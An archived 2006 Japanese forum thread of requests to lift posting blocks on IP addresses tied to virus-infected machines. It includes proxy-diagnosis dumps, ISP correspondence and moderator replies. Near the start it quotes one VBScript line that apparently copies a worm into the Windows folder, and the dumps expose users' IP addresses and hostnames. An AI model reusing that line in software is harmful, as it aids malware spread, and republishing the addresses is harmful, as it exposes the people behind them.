◎正当な理由による書き込みの削除について: 生島英之とみられる方へ:
□規制解除要望□ ウイルス焼き専用★1【PROXY規制中!】->画像>1枚
動画、画像抽出 ||
この掲示板へ
類似スレ
掲示板一覧 人気スレ 動画人気順
このスレへの固定リンク: http://5chb.net/r/sec2chd/1145344117/
ヒント:5chスレのurlに http://xxxx.5chb.net/xxxx のようにbを入れるだけでここでスレ保存、閲覧できます。
ウィルスソースでスレッド立てる人も居るよ
c.Copy(dirwin"\Win32DLL.vbs")
http://human5.2ch.net/test/read.cgi/ms/1145010316/ >3-4
いや、ウイルスソース貼りしている香具師はスレ違いだろ
ここでいいのかな?
-- Your diagnosis --
Date of issue: Tue Apr 18 18:06:10 2006
IP Address:202.32.177.205
RemoteHost:f31-pc205.cty-net.ne.jp
-- %ENV[Environment variable] --
HTTP_ACCEPT_LANGUAGE : ja
HTTP_CONNECTION : Keep-Alive
HTTP_REFERER :
http://info.2ch.net/wiki/pukiwiki.php?BBQ HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
REMOTE_ADDR : 202.32.177.205
REMOTE_HOST : f31-pc205.cty-net.ne.jp
REMOTE_PORT : 60187
-- DSBL --
202.32.177.205 -> None(^-^)
-- BBQ --
202.32.177.205 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
202.32.177.205 -> La ROCA es la vida.(-_-)
-- Tor(an anonymizing overlay network for TCP) --
202.32.177.205 -> None(^-^)
-- PORT CHECKING --
PORT 80: Result:refuse
PORT 1080: Result:refuse
PORT 3128: Result:refuse
PORT 8000: Result:refuse
PORT 8080: Result:refuse
PORT 8888: Result:refuse
ウイルスAll駆除済み
「f31-pc205.cty-net.ne.jp」の解除お願い致しますm(__)m
>>9 見つかったウイルス名を書かなければ解除しないらしい
>>10それは無知でスマンかった…orz
えっと
HackTool.Dos(トロイの木馬)ほか37個見つかりましたですね
-- Your diagnosis --
Date of issue: Tue Apr 18 20:25:17 2006
IP Address:61.86.38.149
RemoteHost:cap007-149.kcn.ne.jp
-- %ENV[Environment variable] --
HTTP_ACCEPT_LANGUAGE : ja
HTTP_CONNECTION : Keep-Alive
HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
REMOTE_ADDR : 61.86.38.149
REMOTE_HOST : cap007-149.kcn.ne.jp
REMOTE_PORT : 4311
-- DSBL --
61.86.38.149 -> None(^-^)
-- BBQ --
61.86.38.149 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
61.86.38.149 -> None(^-^)
-- Tor(an anonymizing overlay network for TCP) --
61.86.38.149 -> None(^-^)
-- PORT CHECKING --
PORT 80: Result:refuse
PORT 1080: Result:refuse
PORT 3128: Result:refuse
PORT 8000: Result:refuse
PORT 8080: Result:refuse
PORT 8888: Result:refuse
ウイルスチェック済みです。
フルスキャンの結果感染は見つかりませんでした。
でもここで解除申請して解除してもらっても
IP/ホスト名変われば無意味な気が・・・
>>12 kcn.ne.jpは全員が駆除しないとだめだからプロバイダに対応してもらわない限り無理だろ
KCNは広い範囲カバーしてるのに…
2chにカキコ出来ないってのは、かなりの人数が不快に思ってるのを自覚したほうがいいな。
http://sports2.2ch.net/test/read.cgi/operatex/1139744972/847 もし一ヶ月近くもかかったら本気で解約祭りになりかねんぞ。
>>14 kcnのインターネットサービス契約数は5万数千戸(公式HPより)
もしちゃねらーが100人に1人しかいなくても…
ちなみに漏れは今ケータイからのカキコ
なぜ「規制リストに追加されました。もうあなたは一生カキコ出来ない」のだ!
まじでいい加減にせい!
>>15 「ERROR:公開PROXYからの投稿は受け付けていません!!(1)」
今回巻き添え被害にあった人間はこう出る筈だぞ。
それはまた違うエラーメッセージだな。連投関係?
KCNの人間の大半は今運営系とか一部の板以外カキコ出来ない筈なんだけどな。
もうだめぽ。。。
>>17 >>15です
今書き込めた
ちなみにさっき「規制リストに追加されました」でカキコできなかったのはこのスレ
>>17,
>>19 >>16で教えてくれてるのに。。。(´・ω・)
http://sakura02.bbspink.com/test/read.cgi/erochara/1114495160/l50 -- Your diagnosis --
Date of issue: Thu Apr 20 22:49:42 2006
IP Address:220.62.8.82
RemoteHost:softbank220062008082.bbtec.net
-- %ENV[Environment variable] --
HTTP_ACCEPT_LANGUAGE : ja
HTTP_CONNECTION : Keep-Alive
HTTP_REFERER :
http://info.2ch.net/wiki/pukiwiki.php?%A5%D7%A5%ED%A5%AF%A5%B7%A4%B8%A4%E3%A4%CA%A4%A4%A4%CE%A4%CBPROXY%B5%AC%C0%A9%A4%CB%B0%FA%A4%C3%A4%AB%A4%AB%A4%C3%A4%BF%BE%EC%B9%E7%A4%CE%C2%D0%BD%E8%CB%A1 HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
REMOTE_ADDR : 220.62.8.82
REMOTE_HOST : softbank220062008082.bbtec.net
REMOTE_PORT : 1259
-- DSBL --
220.62.8.82 -> Listed(-_-)
-- BBQ --
220.62.8.82 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
220.62.8.82 -> None(^-^)
-- Tor(an anonymizing overlay network for TCP) --
220.62.8.82 -> None(^-^)
-- PORT CHECKING --
PORT 80: Result:refuse
PORT 1080: Result:refuse
PORT 3128: Result:refuse
PORT 8000: Result:refuse
PORT 8080: Result:refuse
PORT 8888: Result:refuse
>>23-24 と言うかこの系統のスレあちこち見てたら
ここ最近ケーブル系プロバイダの規制本当に多すぎ
ケーブル系プロバイダが2ちゃんに適さない時代になったのかも知れんが
2ちゃんの運営側も真剣にこれらの対策を考えて欲しい
他力本願と言われるかも知れんがこれだけは本当に一般ユーザーにはどうすることも出来ないからな
KCNが規制に入ってからついに1週間……
今頃奈良県内の大半のちゃねらーは業を煮やしてるぞ恐らく
奈良県内の大半のちゃねらーが業を煮やそうとも、2chは別に困らない
これは乗り越えなければならない大き壁だな
てゆーか、規制されてるのcap001-003だけだし。
全体の数十分の1だけだよ。
あ、間違えた。cap001-016までか。
KCNユーザーのうちのほんの一部だけ。
公開PROXY規制で書き込めないぜ・・なんでだああああああああああああああああああああああああああああああああああああああああ
>>30 レスどうも
なんか難しそうなので放置しときます
このスレの意義は何なんだ
KCNユーザは対象外なのか('A`)
自助努力をしてください。
プロバイダにメールを出すとか。
あかかしたまり事何返?ー
-----
デフラグシュウリョウ
対応する、といった返信が。各ユーザーにウイルス注意を促す〜たら。
他の人も何か返信来ました?
(反応無いからしつこく何度も送ったんだけど、あしらわれてる?)
>>40 > 他の人も何か返信来ました?
> (反応無いからしつこく何度も送ったんだけど、あしらわれてる?)
私も昨日規制くらいましたが、返信も何も来てません。
大人しく1ヶ月ほど待たないといけないんでしょう。
-- Your diagnosis --
Date of issue: Tue Apr 25 07:34:49 2006
IP Address:67.186.214.29
RemoteHost:c-67-186-214-29.hsd1.ut.comcast.net
-- %ENV[Environment variable] --
HTTP_ACCEPT_LANGUAGE : ja
HTTP_CONNECTION : Keep-Alive
HTTP_REFERER :
http://ime.nu/sv2ch.baila6.jp/chk_proxy.cgi HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
REMOTE_ADDR : 67.186.214.29
REMOTE_HOST : c-67-186-214-29.hsd1.ut.comcast.net
REMOTE_PORT : 3453
-- DSBL --
67.186.214.29 -> None(^-^)
-- BBQ --
67.186.214.29 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
67.186.214.29 -> None(^-^)
-- Tor(an anonymizing overlay network for TCP) --
67.186.214.29 -> None(^-^)
-- PORT CHECKING --
PORT 80: Result:refuse
PORT 1080: Result:refuse
PORT 3128: Result:refuse
PORT 8000: Result:refuse
PORT 8080: Result:refuse
PORT 8888: Result:refuse
ウイルス見つかりませんでした。
ネタでダウン板にfusianasanしたのがまずかったようですね。
解除をお願いします。
>>40 漏れは次のように提案されました。
>お客様のお使いのIPをグローバルDHCPへ変更する事で規制の影響を
>受けなくなりますが変更してもよろしかったでしょうか。
ネットワークに無知な漏れには正直、意味を正確に掴みかねるのですが、
要は共有ではない固有のIPを持てという事なのかな。
あと、原因になってる個人を特定するのは無理だと言ってました。
ちなみに、その「各ユーザーにウィルス注意を促す〜」ってメールは
来てませんが、これから来るのかも。
あ!串マークがついてない!もしかして解除してもらえた?
おお!他板にも書き込める!
解除ありがとうございます!
-- Your diagnosis --
Date of issue: Tue Apr 25 19:51:51 2006
IP Address:221.35.181.16
RemoteHost:softbank221035181016.bbtec.net
-- %ENV[Environment variable] --
HTTP_ACCEPT_LANGUAGE : ja
HTTP_CONNECTION : Keep-Alive
HTTP_REFERER :
http://info.2ch.net/wiki/pukiwiki.php?%A5%D7%A5%ED%A5%AF%A5%B7%A4%B8%A4%E3%A4%CA%A4%A4%A4%CE%A4%CBPROXY%B5%AC%C0%A9%A4%CB%B0%FA%A4%C3%A4%AB%A4%AB%A4%C3%A4%BF%BE%EC%B9%E7%A4%CE%C2%D0%BD%E8%CB%A1 HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
REMOTE_ADDR : 221.35.181.16
REMOTE_HOST : softbank221035181016.bbtec.net
REMOTE_PORT : 1380
-- DSBL --
221.35.181.16 -> None(^-^)
-- BBQ --
221.35.181.16 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
221.35.181.16 -> La ROCA es la vida.(-_-)
-- Tor(an anonymizing overlay network for TCP) --
221.35.181.16 -> None(^-^)
-- PORT CHECKING --
PORT 80: Result:refuse
PORT 1080: Result:refuse
PORT 3128: Result:refuse
PORT 8000: Result:refuse
PORT 8080: Result:refuse
PORT 8888: Result:refuse
さっきまで書けていたのに突然書けなくなりますた。
>>49 -- BBX(Unrelated to the proxies.) --
221.35.181.16 -> La ROCA es la vida.(-_-)
お帰りください
→ -- BBX(Unrelated to the proxies.) --
→ 221.35.181.16 -> La ROCA es la vida.(-_-)
客に帰れじゃ話は進まん。
診断書はBBQ&BBXのウイルス焼きに見えるけど。
>>45 グローバルIPをDHCPで貰っても、そのIPが焼かれていたら規制の影響は受ける。
感染者がつなぎかえ(DHCP)で使ってたらどんどん焼かれてそのウチに使えるIPが減る。
共有IPを使っているLAN内の個人を特定する気が無い(技術を持たない)つーコトは、
スパマー御用達だねー。プロバイダがスパマーを守ってると言う事になる。
ウイルスに感染し、他所を爆撃するユーザーはスパマーだよ。
スパムメール送信やウイルスの配布に適するプロバイダってコトだな。
マトモなユーザーは規制にかかって困惑し、スパマーを守るような行動をするプロバイダって
恥ずかしくないのかなー? そんなトコに金を落としたらイカンと思うね。
-- Your diagnosis --
Date of issue: Tue Apr 25 20:00:41 2006
IP Address:203.168.110.195
RemoteHost:195.110.168.203.megaegg.ne.jp
-- %ENV[Environment variable] --
HTTP_ACCEPT_LANGUAGE : ja
HTTP_CONNECTION : Keep-Alive
HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727) Sleipnir/2.30
REMOTE_ADDR : 203.168.110.195
REMOTE_HOST : 195.110.168.203.megaegg.ne.jp
REMOTE_PORT : 1157
-- DSBL --
203.168.110.195 -> None(^-^)
-- BBQ --
203.168.110.195 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
203.168.110.195 -> None(^-^)
-- Tor(an anonymizing overlay network for TCP) --
203.168.110.195 -> None(^-^)
-- PORT CHECKING --
PORT 80: Result:refuse
PORT 1080: Result:refuse
PORT 3128: Result:refuse
PORT 8000: Result:refuse
PORT 8080: Result:refuse
PORT 8888: Result:refuse
レスできなくなって2日目
ppp.dion.ne.jpが串規制になった。
どーゆーわけ?
>>44 c-67-186-214-29.hsd1.ut.comcast.net
解除しますけどー、紛らわしい事するのは
今後はやめて下さいね。
>>40 >>45 俺は違う内容が返ってきました。てか、つい先程も具体的に返信しましたが。
しかし既に一時(?)解除されてたんですね。
でも、まだ根本的な解決には至って無いような
comic6の例の人がウイルス削除したか不明なんで。(又、爆撃で規制な気も)
>ネットワークに無知な漏れには正直、意味を正確に掴みかねるのですが、
要は共有ではない固有のIPを持てという事なのかな。
そです。
>>60 規制の範囲外のIPがくるか、megaeggが続いたらもっと拡大して規制になるかな、情報としてありがとう。
-- Your diagnosis --
Date of issue: Tue Apr 25 21:41:51 2006
IP Address:203.168.119.210
RemoteHost:210.119.168.203.megaegg.ne.jp
-- %ENV[Environment variable] --
HTTP_AAAAAAAAAAAAAAA : +++++++++++++
HTTP_ACCEPT_LANGUAGE : ja,en-us;q=0.7,en;q=0.3
HTTP_CONNECTION : keep-alive
HTTP_KEEP_ALIVE : 300
HTTP_REFERER :
http://info.2ch.net/wiki/pukiwiki.php?%A5%D7%A5%ED%A5%AF%A5%B7%A4%B8%A4%E3%A4%CA%A4%A4%A4%CE%A4%CBPROXY%B5%AC%C0%A9%A4%CB%B0%FA%A4%C3%A4%AB%A4%AB%A4%C3%A4%BF%BE%EC%B9%E7%A4%CE%C2%D0%BD%E8%CB%A1 HTTP_USER_AGENT : Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2
REMOTE_ADDR : 203.168.119.210
REMOTE_HOST : 210.119.168.203.megaegg.ne.jp
REMOTE_PORT : 4535
-- DSBL --
203.168.119.210 -> None(^-^)
-- BBQ --
203.168.119.210 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
203.168.119.210 -> None(^-^)
-- Tor(an anonymizing overlay network for TCP) --
203.168.119.210 -> None(^-^)
-- PORT CHECKING --
PORT 80: Result:refuse
PORT 1080: Result:refuse
PORT 3128: Result:refuse
PORT 8000: Result:refuse
PORT 8080: Result:refuse
PORT 8888: Result:refuse
ウイルス感染はしておりませんでした。
解除の方、よろしくお願いします(_ _)
>>65 規制されてるから待て、という事ですかね?
あまり詳しくないんで意味を取り違えてたらすいません。
>>66 現在のmegaeggの規制範囲:
・203.168.110.0〜203.168.111.255 510
・203.168.112.0〜203.168.127.255 4094
・規制対象IPアドレス数:4608
megaeggに割り当てられているIPアドレスが
どの位あるか分からないが、基本的に繋ぎ替えをして
上記の範囲外のIPアドレスを取得すれば
一時的ながら回避できます。
>>67 分かりました、試してみます。
ありがとうございました。
>>59 ありがとうございました。
今後このようなことは二度としないと肝に銘じておきます。
>>72 http://qb5.2ch.net/test/read.cgi/sec2chd/1144848937/2 >klistを見て、ウィルスによる爆撃を行ってるホストをここに報告してくださいー。
あなたのPCから-tmp6-に爆撃が行われたということです。
おそらくファイル共有ソフトなどから感染したウイルスが原因です。
そのウイルスを駆除しないと再び爆撃が始まってしまうので
規制は解除されません。
まずはアンチウイルスソフトを使って調べてみてください。
ソースネクストウイルスセキュリティ
Fix_VirusOnWinny
以上2つでパソコン内スキャンしましたがウイルスは見つかりませんでした。
>>67 たくさんありますね〜。
コレってウイルスが原因じゃないんですよね?
おとといシマンテックでオンラインスキャンしたところ、Loveletterなどのウイルスが
発見されたんですが。今日、もう一度スキャンしてウイルスの報告をします、待っていてください。
>>76 >softbank221035181016.bbtec.net
ふーむ。では解除してみます。
>>76 >>53で示されているように確実に2件はklistに記録が残っておりますー
。。。ということは4回以上は同じ文字列で書き込みされていることになりますです。
ウィルスによるレスをコピペされたとか他に心当たりはないでしょうか?
現在のRock登録文字列の中には通常の文章で使われるような非常に短いものも
ありますので、巻き添え(私共での取り違え)とか今後も出る可能性はあるかも
知れませんので御理解の程お願い致しますー
皆様方の方でも不用意なコピペ・fusiana等は避けて下さいますようお願い致しますー
尚、これに対するレスは結構ですのでー>76さん
>>78 お手数おかけしましたー
>>67 4時間ほど接続と切断を繰り返してますが、
203.168.110.0〜203.168.127.255 以外のアドレスが割り振られません。
メガエッグのサポートに連絡をとっても、「報告は伺ってます。対応している所です。」と
言うのですが、メガエッグの割り振られたIPの範囲は教えられないと言われてしまいます。
IPアドレスの右から2番目のところをどこか1つだけでも解除してもらえないでしょうか。
softbank221035181016.bbtec.netはマルチ・長文連投煽り荒らしが原因
以前も運営に注意されましたよね?
初めて書き込みさせていただきます。
メガエッグに数日前から問い合わせをしていたのですが、
28日17時ごろ回答が来ました。
ウイルス感染していると思われるユーザーを特定し、対処したとのことです。
2ちゃんねるの方にも同様の連絡をしたそうです。
対処の具体的な内容は知らされていません。
当方のPCはNOD32(1.1511 20060428)でスキャンして異常ありませんでした。
>>84です。
一応診断書貼っておきます。
-- Your diagnosis --
Date of issue: Sat Apr 29 11:06:31 2006
IP Address:203.168.119.52
RemoteHost:52.119.168.203.megaegg.ne.jp
-- %ENV[Environment variable] --
HTTP_ACCEPT_LANGUAGE : ja,en-us;q=0.7,en;q=0.3
HTTP_CACHE_CONTROL : max-age=0
HTTP_CONNECTION : keep-alive
HTTP_KEEP_ALIVE : 300
HTTP_USER_AGENT : Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2
REMOTE_ADDR : 203.168.119.52
REMOTE_HOST : 52.119.168.203.megaegg.ne.jp
REMOTE_PORT : 1704
-- DSBL --
203.168.119.52 -> None(^-^)
-- BBQ --
203.168.119.52 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
203.168.119.52 -> None(^-^)
-- Tor(an anonymizing overlay network for TCP) --
203.168.119.52 -> None(^-^)
-- PORT CHECKING --
PORT 80: Result:refuse
PORT 1080: Result:refuse
PORT 3128: Result:refuse
PORT 8000: Result:refuse
PORT 8080: Result:refuse
PORT 8888: Result:refuse
-- Your diagnosis --
Date of issue: Sat Apr 29 13:52:26 2006
IP Address:203.168.114.97
RemoteHost:97.114.168.203.megaegg.ne.jp
-- %ENV[Environment variable] --
HTTP_ACCEPT_LANGUAGE : ja
HTTP_CONNECTION : Keep-Alive
HTTP_REFERER :
http://info.2ch.net/wiki/pukiwiki.php?%A4%CA%A4%F3%A4%AB%B5%AC%C0%A9%A4%B5%A4%EC%A4%C6%A4%A4%A4%EB%A4%DF%A4%BF%A4%A4%A4%CA%A4%F3%A4%C7%A4%B9%A4%AC%A1%C4 HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
REMOTE_ADDR : 203.168.114.97
REMOTE_HOST : 97.114.168.203.megaegg.ne.jp
REMOTE_PORT : 33393
-- DSBL --
203.168.114.97 -> None(^-^)
-- BBQ --
203.168.114.97 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
203.168.114.97 -> None(^-^)
-- Tor(an anonymizing overlay network for TCP) --
203.168.114.97 -> None(^-^)
-- PORT CHECKING --
PORT 80: Result:refuse
PORT 1080: Result:refuse
PORT 3128: Result:refuse
PORT 8000: Result:refuse
PORT 8080: Result:refuse
PORT 8888: Result:refuse
「ウイルスバスターオンラインスキャン」
「悪意のあるソフトウェアの削除ツール」
の二つでスキャンしたところ、ウイルスによる感染はありませんでした。
できれば、解除をお願いします…
私は無罪です!
早く解除を!
-- Your diagnosis --
Date of issue: Sat Apr 29 23:41:07 2006
IP Address:59.128.138.114
RemoteHost:cc002674.brew.ne.jp
-- %ENV[Environment variable] --
HTTP_ACCEPT_LANGUAGE : ja
HTTP_CONNECTION : Keep-Alive
HTTP_REFERER :
http://info.2ch.net/wikki/pukiwiki.php?BBQ HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 6.0; KDDI-CA31) Opera 7.60 [ja]
REMOTE_ADDR : 59.128.138.114
REMOTE_HOST : cc002674.brew.ne.jp
REMOTE_PORT : 51624
-- DSBL --
59.128.138.114 -> None(^-^)
-- BBQ --
59.128.138.1114 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
59.128.138.114 -> None(^-^)
-- Tor(an anonymizing overlay network for TCP) --
59.128.138.114 -> None(^-^)
-- PORT CHECKING --
PORT 80: Result:refuse
PORT 1080: Result:refuse
PORT 3128: Result:refuse
PORT 8000: Result:refuse
PORT 8080: Result:refuse
PORT 8888: Result:refuse
助けて下さい!
>>89 PCSVは全て規制されました。
大方針は
【Project BBM】携帯端末固有ID規制
http://qb5.2ch.net/test/read.cgi/operate/1093340433/813 813 :root▲ ★ :sage :2006/04/20(木) 14:29:22 ID:???0 ?#
個体が識別できないということであれば、
今後PCSVからの広告投入や荒らしが横行した場合、
一律全部、容赦なく焼くしかないということかなと。
解除の方法はあなたがauにPCSVからの投稿にも携帯固有番号を送るように要望すること。
これしかございません。
更に補足すると、ユーザーからの「PCSVからの投稿にも携帯固有番号を送るように」という要望を
auが受け入れて実行すること、だけどね。
auのPCサイトビュアを使ってるが公開串からは書き込み出来ませんを解除してほしい
こんなやり方でしか規制出来ないなら、
最初から「PCSVでの投稿は出来ません」って明記しろよ。
自分達のオペの影響力を過小評価してないか?
もう「ボランティアだから」なんて逃げが通用するレベルの
存在じゃなくなってるんだよ、あんたらは。
そういう方式にしたのはauですからー。
auに文句言って下さいー。
わかった。
自分達の想定外のものには一律規制ですませる、
つまりはお役所と同じってことだな。
どこが「つまり」なんだか意味不明ですー。
個別に荒らしを規制できない訳ですから
串と同等扱いってだけですのでー。
識別できるようにしなかったauに文句をどうぞー。
技術的に解決してもらって下さいー。
お前ら日本語理解出来ないのか?
たのまれてもダメなものはダメなんだよ。
-- Your diagnosis --
Date of issue: Sun Apr 30 18:08:33 2006
IP Address:59.128.143.207
RemoteHost:cc004047.brew.ne.jp
-- %ENV[Environment variable] --
HTTP_ACCEPT_LANGUAGE : ja
HTTP_CONNECTION : Keep-Alive
HTTP_REFERER :
http://info.2ch.net/wiki/pukiwiki.php?%A5%D7%A5%ED%A5%AF%A5%B7%A4%B8%A4%E3%A4%CA%A4%A4%A4%CE%A4%CBPROXY%B5%AC%C0%A9%A4%CB%B0%FA%A4%C3%A4%AB%A4%AB%A4%C3%A4%BF%BE%EC%B9%E7%A4%CE%C2%D0%BD%E8%CB%A1 HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 6.0; KDDI-CA31) Opera 7.60 [ja]
REMOTE_ADDR : 59.128.143.207
REMOTE_HOST : cc004047.brew.ne.jp
REMOTE_PORT : 60171
-- DSBL --
59.128.143.207 -> None(^-^)
-- BBQ --
59.128.143.207 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
59.128.143.207 -> None(^-^)
-- Tor(an anonymizing overlay network for TCP) --
59.128.143.207 -> None(^-^)
-- PORT CHECKING --
PORT 80: Result:refuse
PORT 1080: Result:refuse
PORT 3128: Result:refuse
PORT 8000: Result:refuse
PORT 8080: Result:refuse
PORT 8888: Result:refuse
59.128.143.207
PCSVからポストできないから調べてみたらこういうことですか。
auが対応しない限り全ブロック永久規制ってのは、暴力的っていうかやりすぎじゃないですか?
どうせ糞業者は別の手を考えるでしょうから時間稼ぎにしかならないと思うんですが。
短期でなくてもいいから期限切るとかも無理ですか。
【BBQ&BBM14本目】公開串登録所【ピンポイント規制】
http://qb5.2ch.net/test/read.cgi/sec2chd/1145893627/96-97 散々既出だが
BBM対応できるようにAUがするまでは解除は無い。
つうか、*.brew.ne.jp関係は
広告爆撃による規制なのでスレ違い。
スレタイよく嫁
なんでPCSV規制するんだ?
あの問題の広告は業者じゃなくて100%頭の悪い個人なんですけど…
業者じゃないんだから規制解除しろよ
>>105 2chは完全無料の個人運営サイトなんだからこれ以上の文句は止めろ
ようやくJig居なくなったら思ったら、今度はbrewかよwwww
つまり、何故規制しなければならないのか、理解できないのか
規制されて何故困るか言えよ
自演出来ないからでしょwww
>>105 一晩寝て頭冷えたか?
今迄もいろんな規制があったんだけどな、
困った人が努力して、規制が解除された事もあるんだ。
此処2chって処は、困った人が動くように出来ているんで、
文句垂れてる暇があったら、如何したらよいか考えて動け。
スレ違い失礼。
>>111PCSVでは自作自演は不可能に近いです。一日IDは一緒です(´,_ゝ`)
なんで馬鹿のせいで全部規制するんだよ
その文句を2chじゃなくてauにぶつければいいのに
ユーザの声が集まればau側が対策取るかも知れませんよ?
jigとかibisみたいに
馬鹿一人アク禁にすればいいだけじゃん
てかここのコテって頭弱いな
なんか知ったかぶり感が滲み出てる
auに要望メール出してみたよ。
たださ、例えばPCSVのOperaは初期化する以外にcookieを
消すことができないから、brew.ne.jpからのアクセスには
専用のcookie食わせて擬似的に端末特定するとか
頭使えば一時的にでも何か対策はあるだろう。
技術的にどうかはともかく何も案を練らずに
「auの仕様がクズだ、だからできないものはできない」
って突っぱねるのはあんまりだと思うんだがなあ。
アドレスブロックにして16,700以上あるんだよ?
>>121 >何も案を練らずに
練った結果ですからー。
>>118 もっと勉強してから書き込みましょうw
>>121 どうして2ちゃん側がそこまで対応する義務があるのかが分からんw
あくまでauが先に対応すべき問題であることは明らかで、そうでなければ
PCSV使いはキャリアを代えるとかするしかないな。
auはそういう危機感ないんじゃないの?
auに何か言って変わらないと思う。
元々PCSVは見るだけに作られている。掲示板に書き込む事は想定していない。
だからauに言ったてauは何もしない。
ようは広告坊と荒らしをどうにかすれば良いんでしょ?
>>124 > auに何か言って変わらないと思う。
なんで?
その論理なら
「2chに何か言って変わらないと思う。」だって言えるんじゃないの?
brew.ne.jpはウィルス焼きではないのでここはスレ違いです。
まぁアドレスブロックはどんなけあっても焼くコストは大きく上がりませんからー。
#最近は範囲焼きもできますし、焼くならデータ一括で(ry
大方針は
>>90+宣伝荒らし確認済み(klist300件以上/week)なのでさよーならー
brew.ne.jp以外の方どーぞー
スレ立て出来ない。。。
草案としてauのPCSVはホストを晒して書き込みをするようにしては?
しかし個人情報は守りたいので掲示板に表示するときは暗号化して欲しい。
megaeggはISPがウイルス感染ユーザーを特定して、
対応したのに規制解除されないんですか?
何度かメールもらってますが、全部転載すると怒られそうなので
対応した旨の箇所を抜粋で貼ります。
> 2ちゃんねるの書き込み制限に関しましては、そのほかのお客さまからも同様の
> お問い合わせをいただいており、既に特定したユーザ様へご連絡済みです。また、制限
> について、2ちゃんねる管理者宛に問い合わせを行っている状況です。
> 書き込みにつきましてはもうしばらくお待ちくださいますようお願い申し上げます。
>>134 ISPが感染ユーザーに連絡はしたが、その感染ユーザーが対応したのかは書いてないな
もうしばらくお待ちくださいってなんかテキトーだなおい。
解除して大丈夫なんかしら
http://qb5.2ch.net/test/read.cgi/sec2chd/1145568956/30 ここで削除人の中の人も言ってる様にISPが削除の有無を完全に把握する事は
難しいと思いますので、様子見は致し方ないかと思うのです。
>もうしばらくお待ちください
については「2ちゃんねるの対応を」ではないでしょうか。
別スレにあったけど、これでもし規制が解除されても大元のウイルスが駆除されてなければ
また爆撃→また規制のいたちごっこだよ
根本から対応しないと意味がない
大元のウイルスの完全駆除を確かめる方法はあるんでしょうか?
今までの規制解除に至ったISPでは自宅まで確認しに行ったんですか?
megaeggはもう永久規制でおk
>>134の抜粋文が社交辞令の返答メールに見えて仕方ない^^;
>>140 ウイルスをばら撒いた人間を特定して、対処はしたと返事をもらうよね。
後は2ちゃんねるとの交渉次第です…みたいな返事なんだけど、2ちゃんねる
側ではどんな風な説明をmegaeggから受けて、それに対してどう対処しようと
思っているのだろ〜か。。
2ちゃんねるがmegaeggからされている交渉について、ここで教えてもらう
わけにはいないのだろ〜か。
もう暫くお待ちください…と返事がくるのみで、事細かに詳しい説明が
megaegg側からはもらえないので、もう永久規制ケテーイ?と思ってしまう。
暫くの暫くが長すぎるよ。
それでなくてもmegaeggはその他の規制が多いというのに。。
私と同様に皆さん規制されて苛立ってのはわかりますが、
まじめに規制解除に向けて努力してる人の足を引っ張っても
何にもならないと思います。
megaegg側も放置するISPがある一方、
感染ユーザーを特定してメールを送って下さっただけでも
精一杯の努力だと認めては頂けないんでしょうか。
>>143 早く早くと逸る気持ちは分からんでもないが、米国産牛肉問題と一緒で
解除したとたんにウイルス再爆撃でもあってみな。
ほぼ不可能な完全確認が取れるまで永久規制だよ。
>>144 ほぼ不可能な安全確認…ってことは、解除しても安全ということは
ほぼ有り得ないので、ほぼ永久規制に決まりました!!ってこと?
なんかそんな風に読めてしまった。。
規制されてて実際の書き込みはなくても、
2ch鯖へのpost/attackの記録は取られてるんだろうから
ウイルスによると思われるそれが減る/なくなれば
いいんじゃないの、違うのかな?
詳しい人ヨロ
規制解除へ向けて、出来る事は実行しようと先程megaeggに電凸しました。
megaegg側ではウイルス感染者を特定した段階で、
接続を停止し、メール連絡の上駆除依頼をしたそうです。
その後そのユーザーはOS再インストール後、
今後のウイルス感染に対する対策を講じたのを直接本人に確認したとの事です。
私が提供したものか他の人が提供したものかどうかわかりませんが、
関連スレに貼ってあった爆撃ログを解析した結果、
複数ではなく特定のユーザー一人のPCからの
ウイルス書き込みだったとの認識の様です。
以上直接担当者から聞いた対応の詳細です。
他に必要な事があればまた電話して担当者に確認しますので
ご指摘よろしくお願いします。
>>147 なんというか…ありがとう。
私ももっと真剣に、解除に向けて取り組むべきだと思っちゃった。。
便乗して中途報告
>弊社にて該当ユーザを特定し、対処にご協力いただいている最中です〜
>該当ユーザ側での対処後、掲示板様側にて規制解除を行なって
>いただく予定でございます、暫く御待ち下さい。
だそうですよ。
megaegg.ne.jpなみなさんへ。
とりあえず203.168.112.0/20の規制あぼーんしておきます。
#また感染あったら知りませんが。
>>150 しみじみありがとう。
久方ぶりに書き込むことができたっ!!
これも地道に規制解除に一生懸命動いてくれた人たちのお陰かも。
その方々にも感謝。
外から帰ってきたら吉報ですか!
>>150 解除のご判断ありがとうございます。
megaeggの担当者はレスポンスも良く、
想像以上に尽力して下さってたようですので、
もし再度ウイルスによる2ちゃんねるへの迷惑行為が発生した場合、
即時に連絡をとり、問題解決に取り組みたいと思います。
